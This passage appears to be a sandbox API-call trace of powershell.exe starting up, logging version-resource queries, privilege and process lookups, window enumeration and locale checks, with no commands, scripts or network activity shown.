	[0100.518] lstrcpyW (in: lpString1=0x3f32e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0100.518] CoTaskMemFree (pv=0x3f32e0) 
	[0100.518] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x2b376dc, puLen=0x29e030) returned 1
	[0100.518] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0100.518] CoTaskMemAlloc (cb=0x44) returned 0x404260
	[0100.518] lstrcpyW (in: lpString1=0x404260, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0100.518] CoTaskMemFree (pv=0x404260) 
	[0100.518] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x2b37740, puLen=0x29e030) returned 1
	[0100.518] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0100.518] CoTaskMemAlloc (cb=0x58) returned 0x3b4720
	[0100.518] lstrcpyW (in: lpString1=0x3b4720, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0100.518] CoTaskMemFree (pv=0x3b4720) 
	[0100.518] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x2b377bc, puLen=0x29e030) returned 1
	[0100.518] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0100.518] CoTaskMemAlloc (cb=0x20) returned 0x45e230
	[0100.518] lstrcpyW (in: lpString1=0x45e230, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0100.518] CoTaskMemFree (pv=0x45e230) 
	[0100.518] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x2b37464, puLen=0x29e030) returned 1
	[0100.518] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0100.518] CoTaskMemAlloc (cb=0x66) returned 0x458060
	[0100.518] lstrcpyW (in: lpString1=0x458060, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0100.518] CoTaskMemFree (pv=0x458060) 
	[0100.518] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x0, puLen=0x29e030) returned 0
	[0100.518] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x0, puLen=0x29e030) returned 0
	[0100.518] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x0, puLen=0x29e030) returned 0
	[0100.518] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29e008, puLen=0x29e000 | out: lplpBuffer=0x29e008*=0x2b3740c, puLen=0x29e000) returned 1
	[0100.519] CoTaskMemAlloc (cb=0x204) returned 0x41a0a0
	[0100.519] VerLanguageNameW (in: wLang=0x0, szLang=0x41a0a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0100.520] CoTaskMemFree (pv=0x41a0a0) 
	[0100.521] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\", lplpBuffer=0x29e058, puLen=0x29e050 | out: lplpBuffer=0x29e058*=0x2b37398, puLen=0x29e050) returned 1
	[0100.526] GetCurrentProcessId () returned 0xc4
	[0100.532] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x29cf80 | out: lpLuid=0x29cf80*(LowPart=0x14, HighPart=0)) returned 1
	[0100.631] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x29cfa0 | out: TokenHandle=0x29cfa0*=0x2ec) returned 1
	[0100.632] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2b3abe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0100.642] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2b3ac50, cb=0x200, lpcbNeeded=0x29dfb8 | out: lphModule=0x2b3ac50, lpcbNeeded=0x29dfb8) returned 1
	[0100.644] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13ff20000, lpmodinfo=0x2b3aec0, cb=0x18 | out: lpmodinfo=0x2b3aec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0100.645] CoTaskMemAlloc (cb=0x804) returned 0x4607e0
	[0100.645] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13ff20000, lpBaseName=0x4607e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0100.645] CoTaskMemFree (pv=0x4607e0) 
	[0100.646] CoTaskMemAlloc (cb=0x804) returned 0x4607e0
	[0100.646] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13ff20000, lpFilename=0x4607e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0100.646] CoTaskMemFree (pv=0x4607e0) 
	[0100.646] CloseHandle (hObject=0x2ec) returned 1
	[0100.654] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc4) returned 0x2ec
	[0100.655] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x29e0e8 | out: lpExitCode=0x29e0e8*=0x103) returned 1
	[0100.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b3b088, Length=0x20000, ResultLength=0x29e0b0 | out: SystemInformation=0x12b3b088, ResultLength=0x29e0b0*=0x11c70) returned 0x0
	[0100.813] EnumWindows (lpEnumFunc=0x27366ac, lParam=0x0) returned 1
	[0101.067] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x334
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x324
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.068] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x45c
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x20242, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x914
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x914
	[0101.069] GetWindowThreadProcessId (in: hWnd=0xa022e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x9ec
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x1401b2, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x610
	[0101.069] GetWindowThreadProcessId (in: hWnd=0x60192, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xb5c
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xbdc
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x8f0
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xb8c
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x5e0
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x90
	[0101.070] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.070] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.071] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.071] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x840
	[0101.071] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x844
	[0101.071] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x46c
	[0101.071] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xb40
	[0101.071] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x914
	[0101.071] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x988
	[0101.071] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x914
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x950
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x914
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x914
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x868
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x850
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x830
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x814
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x744
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x2a8
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x534
	[0101.072] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x5e4
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x5c4
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x58c
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x238
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x584
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x7e8
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x678
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x35c
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x51c
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x360
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x274
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x588
	[0101.073] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xc8
	[0101.074] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x21c
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x5ec
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x334
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x664
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x334
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x664
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x334
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x5ec
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x5ec
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x550
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x7a0
	[0101.074] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x594
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x564
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x45c
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x548
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x518
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x508
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.075] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4ec
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x45c
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x45c
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x44c
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x7ec
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x45c
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x324
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4a0
	[0101.076] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x914
	[0101.077] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x914
	[0101.077] GetWindowThreadProcessId (in: hWnd=0x4023c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x9b4
	[0101.077] GetWindowThreadProcessId (in: hWnd=0x500be, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x8fc
	[0101.077] GetWindowThreadProcessId (in: hWnd=0x6022a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xbc0
	[0101.077] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xb0
	[0101.077] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x804
	[0101.077] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xbc8
	[0101.077] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x854
	[0101.077] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x140
	[0101.077] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x55c
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x34c
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xb40
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x988
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x868
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x850
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x830
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x814
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x744
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x2a8
	[0101.078] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x534
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x5e4
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x5c4
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x58c
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x238
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x584
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x7e8
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x678
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x35c
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x51c
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x360
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x274
	[0101.079] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x588
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0xc8
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x21c
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x664
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x334
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x5ec
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x550
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x7a0
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x594
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x45c
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x508
	[0101.080] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x4ec
	[0101.081] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x45c
	[0101.081] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x29de10 | out: lpdwProcessId=0x29de10) returned 0x7ec
	[0101.085] WerSetFlags () returned 0x0
	[0101.093] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0101.093] CoTaskMemFree (pv=0x0) 
	[0101.094] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x29e178, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x29e170 | out: pulNumLanguages=0x29e178, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x29e170) returned 1
	[0101.094] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x29e178, pwszLanguagesBuffer=0x2b62e78, pcchLanguagesBuffer=0x29e170 | out: pulNumLanguages=0x29e178, pwszLanguagesBuffer=0x2b62e78, pcchLanguagesBuffer=0x29e170) returned 1
	[0101.196] CoTaskMemAlloc (cb=0x24) returned 0x45e380
	[0101.196] GetUserDefaultLocaleName (in: lpLocaleName=0x45e380, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0101.196] CoTaskMemFree (pv=0x45e380) 
	[0101.219] CoTaskMemAlloc (cb=0x104) returned 0x447cc0
	[0101.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x447cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0101.219] CoTaskMemFree (pv=0x447cc0) 
	[0101.221] CoTaskMemAlloc (cb=0x104) returned 0x447cc0
	[0101.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x447cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0101.221] CoTaskMemFree (pv=0x447cc0) 
	[0101.223] CoTaskMemAlloc (cb=0x104) returned 0x447cc0
